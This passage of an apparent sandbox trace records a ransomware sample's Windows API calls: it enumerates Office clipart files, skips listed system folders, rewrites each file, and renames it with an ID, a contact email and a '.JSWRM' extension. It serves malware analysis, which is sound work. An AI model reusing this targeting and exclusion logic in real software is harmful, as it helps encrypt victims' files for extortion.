Flags=0x0, Size=0xee) returned 0x248058 [0082.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0082.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.022] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107280.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107280.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0082.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0082.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.023] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3734, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107282.WMF", cAlternateFileName="")) returned 1 [0082.023] lstrcmpiW (lpString1="J0107282.WMF", lpString2=".") returned 1 [0082.023] lstrcmpiW (lpString1="J0107282.WMF", lpString2="..") returned 1 [0082.023] lstrcmpiW (lpString1="J0107282.WMF", lpString2="...") returned 1 [0082.023] lstrcmpiW (lpString1="J0107282.WMF", lpString2="windows") returned -1 [0082.023] lstrcmpiW (lpString1="J0107282.WMF", lpString2="recovery") returned -1 [0082.023] lstrcmpiW (lpString1="J0107282.WMF", lpString2="perflogs") returned -1 [0082.023] lstrcmpiW (lpString1="J0107282.WMF", lpString2="documents and settings") returned 1 [0082.023] lstrcmpiW (lpString1="J0107282.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.023] lstrcmpiW (lpString1="J0107282.WMF", lpString2="system volume information") returned -1 [0082.023] lstrcmpiW (lpString1="J0107282.WMF", lpString2="msocache") returned -1 [0082.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0082.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107282.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107282.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107282.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0082.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0082.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107282.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107282.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107282.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0082.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0082.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0082.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0082.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107282.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.024] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14132) returned 1 [0082.024] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3730) returned 0x24d210 [0082.024] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3730, lpOverlapped=0x0) returned 1 [0082.026] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.027] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3730, lpOverlapped=0x0) returned 1 [0082.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.027] CloseHandle (hObject=0x314) returned 1 [0082.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0082.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0082.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0082.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0082.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0082.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0082.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.027] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107282.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107282.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0082.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0082.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0082.028] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x347c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107288.WMF", cAlternateFileName="")) returned 1 [0082.028] lstrcmpiW (lpString1="J0107288.WMF", lpString2=".") returned 1 [0082.028] lstrcmpiW (lpString1="J0107288.WMF", lpString2="..") returned 1 [0082.028] lstrcmpiW (lpString1="J0107288.WMF", lpString2="...") returned 1 [0082.028] lstrcmpiW (lpString1="J0107288.WMF", lpString2="windows") returned -1 [0082.028] lstrcmpiW (lpString1="J0107288.WMF", lpString2="recovery") returned -1 [0082.028] lstrcmpiW (lpString1="J0107288.WMF", lpString2="perflogs") returned -1 [0082.028] lstrcmpiW (lpString1="J0107288.WMF", lpString2="documents and settings") returned 1 [0082.028] lstrcmpiW (lpString1="J0107288.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.028] lstrcmpiW (lpString1="J0107288.WMF", lpString2="system volume information") returned -1 [0082.028] lstrcmpiW (lpString1="J0107288.WMF", lpString2="msocache") returned -1 [0082.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0082.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107288.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107288.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107288.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0082.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0082.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107288.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107288.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107288.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0082.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0082.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0082.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0082.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107288.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.029] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13436) returned 1 [0082.029] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3470) returned 0x24d210 [0082.029] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3470, lpOverlapped=0x0) returned 1 [0082.031] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.031] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3470, lpOverlapped=0x0) returned 1 [0082.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.031] CloseHandle (hObject=0x314) returned 1 [0082.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0082.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0082.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0082.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0082.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0082.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0082.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.032] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107288.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107288.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0082.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0082.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0082.033] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3014, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107290.WMF", cAlternateFileName="")) returned 1 [0082.033] lstrcmpiW (lpString1="J0107290.WMF", lpString2=".") returned 1 [0082.033] lstrcmpiW (lpString1="J0107290.WMF", lpString2="..") returned 1 [0082.033] lstrcmpiW (lpString1="J0107290.WMF", lpString2="...") returned 1 [0082.033] lstrcmpiW (lpString1="J0107290.WMF", lpString2="windows") returned -1 [0082.033] lstrcmpiW (lpString1="J0107290.WMF", lpString2="recovery") returned -1 [0082.033] lstrcmpiW (lpString1="J0107290.WMF", lpString2="perflogs") returned -1 [0082.033] lstrcmpiW (lpString1="J0107290.WMF", lpString2="documents and settings") returned 1 [0082.033] lstrcmpiW (lpString1="J0107290.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.033] lstrcmpiW (lpString1="J0107290.WMF", lpString2="system volume information") returned -1 [0082.033] lstrcmpiW (lpString1="J0107290.WMF", lpString2="msocache") returned -1 [0082.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0082.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107290.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107290.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107290.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0082.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107290.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107290.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107290.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0082.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0082.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0082.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.034] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12308) returned 1 [0082.034] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3010) returned 0x24d210 [0082.034] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3010, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3010, lpOverlapped=0x0) returned 1 [0082.037] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.037] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3010, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3010, lpOverlapped=0x0) returned 1 [0082.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.037] CloseHandle (hObject=0x314) returned 1 [0082.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0082.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0082.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0082.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0082.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0082.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.038] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0082.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0082.039] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x99c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107300.WMF", cAlternateFileName="")) returned 1 [0082.039] lstrcmpiW (lpString1="J0107300.WMF", lpString2=".") returned 1 [0082.039] lstrcmpiW (lpString1="J0107300.WMF", lpString2="..") returned 1 [0082.039] lstrcmpiW (lpString1="J0107300.WMF", lpString2="...") returned 1 [0082.039] lstrcmpiW (lpString1="J0107300.WMF", lpString2="windows") returned -1 [0082.039] lstrcmpiW (lpString1="J0107300.WMF", lpString2="recovery") returned -1 [0082.039] lstrcmpiW (lpString1="J0107300.WMF", lpString2="perflogs") returned -1 [0082.039] lstrcmpiW (lpString1="J0107300.WMF", lpString2="documents and settings") returned 1 [0082.039] lstrcmpiW (lpString1="J0107300.WMF", 